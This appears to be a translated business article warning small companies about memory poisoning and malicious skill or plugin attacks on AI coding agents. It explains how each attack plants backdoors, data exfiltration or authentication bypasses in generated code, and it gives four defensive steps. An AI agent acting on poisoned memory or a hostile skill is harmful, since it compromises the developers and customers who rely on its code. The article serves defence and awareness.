A World Where ‘Realizing an 8-Year Concept in 3 Months’ Becomes Normal — The Winning Strategies for Small and Medium Enterprises Are Changing
Related Articles
Your Company’s AI Coding Tools: Who Is Validating Them?
GitHub Copilot, Cursor, Cline. The use of AI coding agents in development environments is rapidly increasing. Automatic code generation, bug fixing, refactoring—productivity is indeed on the rise. One survey even reported that the introduction of AI coding tools improved development speed by as much as 55%.
However, lurking behind this convenience is a risk that could critically endanger small businesses.
“Memory poisoning” and “malicious skill attacks” are attack methods that inject poison into the memory and extensions of AI coding agents, contaminating the code they generate. Recent research has revealed that this threat is no longer just theoretical but has reached a demonstrable level.
For small businesses that lack dedicated security personnel, this is a problem that cannot simply be brushed aside as “unknown.”
What Is Happening—Two Attack Methods
Memory Poisoning: Rewriting the AI’s ‘Memory’
Many AI coding agents retain past interactions and settings as memory. Memory poisoning is a method that injects malicious data into this memory, embedding backdoors or vulnerabilities in the code generated by the AI.
Developers trust the code generated by the AI as “usual output.” But what if a line of code that sends data externally is hidden within? What if there is logic that bypasses authentication? Would it be caught during code review?
To be honest, in environments without dedicated security engineers, the chances of detection are high.
Malicious Skill Attacks: Extensions as Backdoors
AI coding agents can be enhanced with “skills” or “plugins” developed by third parties. This is similar to the app store model for smartphones. By simply installing convenient extensions, new functionalities can be utilized.
The problem is that these skills can possess system-level permissions. Reading and writing files, sending network requests, accessing environment variables—if the necessary permissions for legitimate functions are exploited by malicious developers, it can become a pathway for intrusion into the company’s IT infrastructure.
Recent research reported that 1,110 hostile skills were generated, with a bypass rate for security reviews ranging from 11.6% to 33.5%. This means that 1 to 3 out of every 10 malicious skills have the potential to slip through the review process and be published.
What Is Scary for Small Businesses
Large corporations have security teams that audit code and establish review processes for the introduction of third-party tools. But what is the reality for small businesses?
- Developers: 1 to 3. Security personnel: Zero.
- Code reviews are either non-existent or merely a formality.
- Plugins are installed simply because they seem convenient.
- There is no incident response plan.
What would happen if an attack occurred in this state?
Customer data leaks. Obligations to report under personal information protection laws, notifications to customers, loss of trust. For small businesses, a decrease in customer retention can lead to a revenue drop of 10% to 20% of annual sales. For a company with annual sales of 50 million yen, that translates to a loss of 5 to 10 million yen.
System downtime. If infected by ransomware, the average recovery time is 23 days (according to IBM). When combined with lost sales during that period, recovery costs, and preventive measures, the total can reach several million yen even for small businesses.
Legal liability. If there are vulnerabilities in systems handling customer data, the excuse “I didn’t know because the code was generated by AI” will not hold up. The responsibility lies with the company.
Four Defensive Measures You Can Start Today
You don’t need to make significant security investments. Start with the following four steps.
1. Take Inventory of Third-Party Skills
List all the skills and plugins currently installed in your AI coding tools. For each one, check “who created it,” “when it was installed,” and “is it really necessary?” Immediately remove anything unnecessary. This will take 1 to 2 hours and cost nothing.
2. Enforce a “Trusted Sources Only” Rule
Establish a minimum review process for introducing skills. Do not install anything that does not have a rating of 4 stars or higher, over 1,000 downloads, and clearly stated developers from the official marketplace. Summarize this rule on a single sheet of paper and share it with all developers.
3. Make ‘Diff Reviews’ of AI-Generated Code a Habit
Do not merge code generated or modified by AI without reviewing the differences. Always check the diffs, especially in areas related to network communication, file operations, and authentication processes. Perfection is not necessary; just having the habit of looking can help detect obvious anomalies.
4. Hold a Monthly ’15-Minute Security Meeting’
Once a month, set aside 15 minutes for the development team to share “recent security-related news.” This includes vulnerability information about AI coding tools, new attack methods, and incidents affecting other companies. Just being aware of this information can help prevent attacks.
‘Convenience’ and ‘Danger’ Enter Through the Same Door
AI coding tools can dramatically enhance the development capabilities of small businesses. Even with a small team, there is potential to develop at speeds comparable to large corporations. To maximize these benefits, it is essential to understand the risks correctly.
The notion that “we are too small to be targeted” is a fantasy. Attackers do not discriminate by size; rather, small businesses with weaker defenses become prime targets.
We do not say to avoid using AI coding tools. They should be used. However, the principle that “AI-generated code requires the same level of scrutiny as human-written code, if not more” must not be forgotten.
The moment you become intoxicated by convenience and neglect validation, the ‘poison’ of AI code begins to quietly spread within your organization.
Points of Attention Going Forward
Discussions about the security of AI coding agents will accelerate through the latter half of 2025. Major platforms are moving towards stricter review standards for skills, but the evolution of attack methods shows no signs of stopping. Of particular concern is the security in “multi-agent environments” where AI agents collaborate. When Agent A generates code that Agent B executes, who is responsible when poison enters that chain? There is still no answer to this question.
The best strategy for small businesses is simple: Conduct an inventory of existing tools today. This is the most cost-effective security measure.
JA
EN